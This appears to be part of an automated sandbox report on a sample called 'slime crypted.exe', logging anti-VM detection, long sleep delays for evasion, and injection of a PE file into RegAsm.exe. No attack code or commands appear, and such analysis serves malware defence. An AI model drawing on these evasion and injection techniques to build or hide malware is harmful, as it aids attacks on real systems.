Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: slime crypted.exe PID: 6600, type: MEMORYSTR

Source: C:\Users\user\Desktop\slime crypted.exe	Memory allocated: 1060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Memory allocated: 2D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Memory allocated: 4D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4F20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599014	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598871	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598755	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598587	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598404	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596322	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596105	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595819	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595467	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595139	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594156	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1937			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 7923			Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe TID: 1488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5960	Thread sleep count: 1937 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5960	Thread sleep count: 7923 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -599014s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -598871s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -598755s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -598587s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -598404s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -598296s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -598077s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597858s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597749s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597530s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596322s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -596105s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -595819s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -595577s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -595467s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -595139s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -594375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -594265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1488	Thread sleep time: -594156s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599014	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598871	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598755	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598587	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598404	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596322	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596105	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595819	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595467	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595139	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594156	Jump to behavior

Source: RegAsm.exe, 00000003.00000002.4503782256.00000000011B1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0142C168 LdrInitializeThunk,LdrInitializeThunk,

3_2_0142C168

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\slime crypted.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\slime crypted.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\slime crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: ED8008	Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe	Queries volume information: C:\Users\user\Desktop\slime crypted.exe VolumeInformation	Jump to behavior
